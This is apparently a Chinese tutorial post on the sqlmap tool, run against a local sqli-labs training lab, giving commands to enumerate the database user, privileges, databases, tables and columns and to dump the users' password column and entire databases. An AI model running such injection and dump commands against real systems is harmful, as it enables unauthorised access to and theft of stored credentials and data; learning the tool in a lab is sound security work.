[工具使用]SqlMap(中)

简介: [工具使用]SqlMap

查询数据库当前用户

sqlmap -u "http://127.0.0.1/sqli-lasb/Less-1/?id=1" --current-user  #查看数据库当前的用户

image.png

查询当前数据库用户是否是管理员权限

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba  #判断当前用户是否有管理员权限

image.png

列出数据库的管理员用户名

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --roles

image.png

查询所有数据库

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs

image.png

查询当前数据库

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db

image.png

输出指定数据库名字下的全部表

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --tables

image.png

输出指定数据名下指定表下的全部列

sqlmap -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --columns

image.png

输出指定数据库指定列指定字段下的全部数据

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C password --dump

image.png

-all系列

1、输出该数据库中全部数据

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dump-all

时间过长,截取选取扫描过程中的过程截图:

image.png

2、输出指定数据库中的全部数据

sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --dump-all

时间过长,截取选取扫描过程中的过程截图:

image.png

相关文章
|
Python Windows
sqlmap安装及简介
sqlmap安装及简介
416 0
|
SQL 测试技术 网络安全
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
1546 0
[ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
|
2月前
|
SQL 关系型数据库 MySQL
sqlmap进阶使用
sqlmap进阶使用
|
3月前
|
SQL 安全 关系型数据库
KALI下Sqlmap工具使用方法之GET方法篇
KALI下Sqlmap工具使用方法之GET方法篇
115 0
|
7月前
|
SQL 物联网 关系型数据库
sqlmap工具的使用 (超详细附工具版)_python sqlmap
sqlmap工具的使用 (超详细附工具版)_python sqlmap
|
SQL 安全 网络安全
Sqlmap学习 -- Tamper绕过脚本
Sqlmap学习 -- Tamper绕过脚本
1046 0
|
关系型数据库 MySQL 数据库
Sqlmap学习 -- Tapmer绕过脚本(三)
Sqlmap学习 -- Tapmer绕过脚本(三)
194 0
|
SQL 安全 数据库
sqlmap的基本使用方法
sqlmap的基本使用方法
380 0
|
SQL 安全 关系型数据库
网络安全——Sqlmap的脚本详解
渗透的时候感觉使用sqlmap攻击sql注入漏洞时成功率很低,想起sqlmap有自己的过滤脚本,但是都是英文,自己的英语也不太好,所以就很烦,今天抽出时间来整理了一下sqlmap的过滤脚本,分享出来希望对大家有帮助
297 0
网络安全——Sqlmap的脚本详解
|
SQL
【工具】sql注入的基本原理与sqlmap的简单使用
本文将介绍超重量级工具SQLMAP的使用,我们将从OSCP经典教材出发,以视频的方式为您讲解其原理,此外我们将常用命令加以整理,为您奉上。
141 0